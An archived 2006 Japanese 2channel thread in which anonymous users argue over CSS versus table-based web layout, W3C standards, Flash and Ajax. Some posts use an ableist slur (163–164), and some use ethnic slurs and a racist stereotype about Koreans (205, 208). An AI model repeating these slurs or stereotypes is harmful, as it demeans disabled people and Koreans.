コーディング専門でやってる分野の人間にはかなわないだろうけど、phpなんかに長けた人もそれなりにグラフィックソフト使えるようになるね、何故だか。
どちらの分野でも、駄目な人間は何をやらせてもやっぱ駄目。
頭脳があるかないかってことなんだろう。

163 :Name_Not_Found:2006/09/28(木) 15:11:05 ID:???
写真やCGを見せたいならCSSはいらないし、テキストで括る必要も無いんだよ。
CSS使いましょう、alt書きましょうってのは「検索にひっかかりましょう」と
言う事なんだ。W3Cが目指してるのはカタワの為の規格じゃない事は言うまでも
無い。


164 :Name_Not_Found:2006/09/28(木) 15:42:36 ID:???
W3Cがカタワ。
視覚インパクトのないサイトなんて糞。

165 :Name_Not_Found:2006/09/28(木) 15:49:27 ID:???
CSSだって使い方次第で視覚的なデザインできるじゃない。
むしろ、CSSのほうが表現の幅が広がることだってある。ウインドウ内に背景付きの半透明するロールウインドウとか。
視覚インパクトがウエイトを占めるというのには賛成、テーブルにしろCSSにしろ、素材となる画像なりボタンのデザインが糞ならそれだけで終わってる。

166 :Name_Not_Found:2006/09/28(木) 15:50:17 ID:???
半透明するロールウインドウ

半透明スクロールウインドウ

167 :Name_Not_Found:2006/09/28(木) 22:05:34 ID:pCO2FsHL
CSSサイトはのっぺらとしたところが多い
なんつーか、どこも一緒に見える

168 :Name_Not_Found:2006/09/28(木) 22:25:35 ID:???
新聞が新聞に適したデザインに落ち着いているように、
CSSのWebサイトもWebサイトに適したデザインに落ち着いてるんじゃないですかね。
自分は新聞がどれも一緒に見えるけど、それで滑稽だなと思ったことはない。

169 :Name_Not_Found:2006/09/28(木) 22:48:55 ID:???
だが、雑誌はどれも一緒に見える訳ではあるまい?

新聞は基本的に質実剛健で地味な媒体だが
雑誌はビジュアル重視のものも多く、新聞よりは明らかに派手だ。

>>168はwebサイトは新聞的であるのが好ましいと思い
雑誌的なwebサイトは好ましくないと思うのか?

170 :Name_Not_Found:2006/09/29(金) 02:50:21 ID:???
>>168
新聞は媒体メディアとしてのパターンが完成している。
それとCSSを同等に取り扱うのはおかしい。
同一レベルで比較するならwebサイト全体、その中でCSSがどれだけの表現力があるかってこと。
CSSで表現の幅を拡げて、うまく使っているサイトもあれば、逆にCSSにこだわりすぎて表現の幅を狭めてしまっているサイトもある、後者は本来の目的を見失ってしまっている。
CSSサイトは何も新聞のようにニュースに限定したような限定されたカテゴリのものじゃないだろ。

171 :Name_Not_Found:2006/09/29(金) 05:29:14 ID:???
まだそんなふるい議論続けてるのかよ。

172 :Name_Not_Found:2006/09/29(金) 07:11:19 ID:???
CSSは表現の幅を広げるためのものじゃなくて
文書の構成要素とその出力を対応させる写像みたいなもんだろ。

つーか「本来の目的」って何なんだよ。

173 :Name_Not_Found:2006/09/29(金) 07:22:05 ID:ppzYVou1
テーブルレイアウターの俺でもcssの表現力は大したもんだと思うよ
できないのはテーブルレイアウトの完全なる再現くらいで

段組はテーブルで、その他はcssでがベストかなと思ってる

174 :Name_Not_Found:2006/09/29(金) 10:46:13 ID:???
>>172
本来の目的は、文章とコンテンツの構造化のみをhtmlにして、装飾的なことはcssという大前提。
今更何いってるの。
文章、テキストのみならcss無し、htmlのみでできるわけで。
半透明のスクロールーバー付きウインドウをページ内にcssで配置したり、画像をスライスしてテーブルで配置やボタン化したり、
ビジュアルデザインでテーブルやcssを駆使してサイトにあったものを作り出すのがデザイナーの力量。

175 :Name_Not_Found:2006/09/29(金) 12:46:20 ID:???
>>172
CSSは、表現手法のための道具なの

176 :Name_Not_Found:2006/09/29(金) 19:06:41 ID:CdRSGvsU


ま  た  W  3  C  信  者  か

177 :Name_Not_Found:2006/09/29(金) 21:24:16 ID:???
そんなたいそなもんでもあらへん。

178 :Name_Not_Found:2006/09/30(土) 00:19:36 ID:???
パソコンの能力と通信速度が上がると、手軽なAjaxとかフラッシュ多用になるよ。
アプリ化っていうかな。デザイン的にはそっちの方が容易だもの。
CSSは多分廃れる規格だ。

179 :Name_Not_Found:2006/09/30(土) 02:46:37 ID:???
>>172
デザインの幅拡げなくていいのならcssやテーブルは不要。
cssが何なのか全く解らずに発言してるだろ。

>>178
cssとflashを同等に考えるなよ。
cssが消えるってことはhtmlも消えるってことだけど、そんなこと起こるとしてもずっと先。
ブラウザというカテゴリもなくなり代わりにプレーヤーになるような時代の話。
何でもかんでも派手な動きを付ければいいというものでもない。文章が重要なサイトや、ニュースサイトなんかがビューンってなったら見にくいだろが。
確かにflashで全てことが足りるとどんなに楽かといつも思うが。
レイアウトや装飾は規格に縛られること無いし。javascriptが扱えているのならほとんど同じ言語のactionscriptも簡単に使えるしな。

Ajaxもflashと同等に扱うなよ。
Ajaxはcssもhtmlも構成要素の一部なんだけど。

180 :Name_Not_Found:2006/09/30(土) 08:41:36 ID:???
>>174
>本来の目的は、文章とコンテンツの構造化のみをhtmlにして、装飾的なことはcssという大前提。

ならテーブルレイアウトやその他の物理マークアップ、とほほマークアップを廃して
見た目を全てCSSで制御するのは本来の目的に適うことになるよ。

181 :Name_Not_Found:2006/09/30(土) 09:20:43 ID:???
>>180
今更何を。その為のCSSなんだから。
現実問題的に大きな画像をスライスしてボタン作成など、テーブルの方がやりやすい者があったり、イメージマップのほうが適しているソースもあるから、
またブラウザの対応状況などから、まともなデザはサイトによりこれらを使い分けて作成してるわけで。
CSSもビジュアル効果やレイアウトを行うための1ツールに過ぎない。
何が言いたいの?

182 :Name_Not_Found:2006/09/30(土) 09:47:12 ID:???
>>181 そこのメガネ!! 静かにしなさい、授業中ですよ!!

183 :Name_Not_Found:2006/09/30(土) 09:49:01 ID:???
何この壊れかた

184 :Name_Not_Found:2006/09/30(土) 16:57:58 ID:???
>Ajaxはcssもhtmlも構成要素の一部なんだけど。
だからこそ、今までは想像もつかなかったようなとんでもマークアップに
お目にかかる機会が増えるだろうな。

185 :Name_Not_Found:2006/09/30(土) 17:41:18 ID:???
Ajax今でもXML系統やjavascriptとactionscriptという双子の言語を使って、またcssも浸透してきて、これらでサイト構成しるんだから、
それが統合的なプラットフォームになるだけで、制作者側としての技能は今と大してかわらんだろな。ユーザー側も同じ。
変わるのはブラウザの見えないところで、XMLをhtmlやcssに変換されるAjaxエンジンが追加されることぐらい。

186 :Name_Not_Found:2006/09/30(土) 22:26:43 ID:???
テブル厨はそこまで考えてません><

187 :Name_Not_Found:2006/09/30(土) 22:42:30 ID:???
ユーザーにはどうでもいいことw

188 :Name_Not_Found:2006/10/01(日) 00:35:43 ID:???
テーブルレイアウトうざっ!

189 :Name_Not_Found:2006/10/01(日) 00:51:18 ID:???
むしろユーザーにとってはcssで君であるページの方がウザいところが多い。
使いこなせないくせにその気になってる馬鹿が多いのには困ったものだ。

190 :Name_Not_Found:2006/10/01(日) 01:09:52 ID:???
テーブルレイアウトうざっ!

191 :Name_Not_Found:2006/10/01(日) 01:14:08 ID:???
入子の入子の入子の入子。
イメージマップも使用してますw
http://www.ai21.net/bousai/zenkoku/

192 :Name_Not_Found:2006/10/01(日) 01:31:53 ID:???
これは仕事での話しなの?
仕事でっていう意味なら、クライアントの要件満たせるやり方をするべきだと思う。
個人的にはテーブルは表に使うものと思ってるが、どうしてもテーブルレイアウトしなければ
いけない時ってのはあるね。
個人でっていう話なら好きなほうをやってくれとしか言えない。

193 :Name_Not_Found:2006/10/01(日) 01:33:43 ID:???
>>191
堅牢そうでよろしい。

194 :Name_Not_Found:2006/10/01(日) 01:40:56 ID:???
ヤフーのトップなんかも大分変わったよね。
昔は入れ子の入れ子のspacer.gifばかりだった。

195 :Name_Not_Found:2006/10/01(日) 02:14:47 ID:???
Yahoo!糞だもんwww

196 :Name_Not_Found:2006/10/01(日) 05:18:13 ID:???
>>192
いちおう、何を持ってレイアウトするかってのは、そんなにクライアント側は入ってこないよ、うちの場合?
デザインやナビゲーションのプレゼンテーションや相談・数度の会議で決定した後のコーディングはこっち任せがほとんどだけどな。
一応うちでは、ガチでいくのが前提なので、特に商用サイトはテーブルいまだに多いな。
各ブラウザやOSでのCSSの対応状況の早見表というのがあって、全て対応しているものしか基本的には使えない。
あえてそれでも使う場合、たとえば子要素に直接スタイル指定とか、隣接セレクタや、疑似クラスの :childや:focusを使うときは、事前にクラに説明&上司の認証印が必要。
そんな状況なので何でもかんでもCSSではできないし、そうなるまでには当分かかるだろうな。

197 :Name_Not_Found:2006/10/01(日) 08:56:22 ID:???
>テーブルレイアウトうざっ!


また前スレの1000か! ウザイんだよ! ボケ!

198 :Name_Not_Found:2006/10/01(日) 09:24:30 ID:???
また前スレの999か! 臭いな! ぷんぷん臭うぞおまえ!

199 :Name_Not_Found:2006/10/01(日) 12:07:00 ID:???
要するにスライス知らないんで火病起こしてると

200 :Name_Not_Found:2006/10/01(日) 12:07:41 ID:???
また前スレの1000か! ウザイんだよ! ボケ!

201 :Name_Not_Found:2006/10/01(日) 14:42:23 ID:???
スライスだってtableレイアウトだろ。

202 :Name_Not_Found:2006/10/01(日) 18:27:25 ID:???
スライスのやり方すら知らないド阿呆がcss厨になって火病を起こしていると。

203 :Name_Not_Found:2006/10/01(日) 20:56:13 ID:???
火病を起こす?
起こすものかあれは?

204 :Name_Not_Found:2006/10/02(月) 05:56:55 ID:???
あ、そうか、持病ってやつか。

205 :Name_Not_Found:2006/10/02(月) 09:20:56 ID:???
朝鮮病。
辛いもん食い過ぎて頭がおかしくなってる半島人特有の持病。
それをチョン語で火病(ファビョ)という。

206 :Name_Not_Found:2006/10/02(月) 10:45:52 ID:???
辛いもん食い過ぎが原因という、科学的・臨床的なデータはあるのかな?
そうだとしたら日本人でも辛いのよく食べるとなるのかな?
遺伝子に組み込まれてるんじゃないのか?

207 :Name_Not_Found:2006/10/02(月) 19:37:58 ID:???
それは>>206の遺伝子が(r

208 :Name_Not_Found:2006/10/03(火) 03:20:37 ID:???
チョンですか?>>207

209 :Name_Not_Found:2006/10/23(月) 19:20:16 ID:???
朝鮮 壬

210 :Name_Not_Found:2006/12/28(木) 15:43:33 ID:???
ttp://www.afjeinc.com/company/profile.html
このページのようなレイアウトにテーブルを主に使って、文字の装飾程度にcssを使っていて
IEブラウザの文字の大きさ設定の影響を全く受けないのはどのように作られてるのでしょうか
自分も似たようなテーブルページを作ってますが、文字はなく画像だけのtdの部分もズレたりするので・・・

211 :Name_Not_Found:2006/12/29(金) 23:35:15 ID:???
リンク先見てないけど
cssでフォントサイズを絶対指定してるんじゃないの?

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)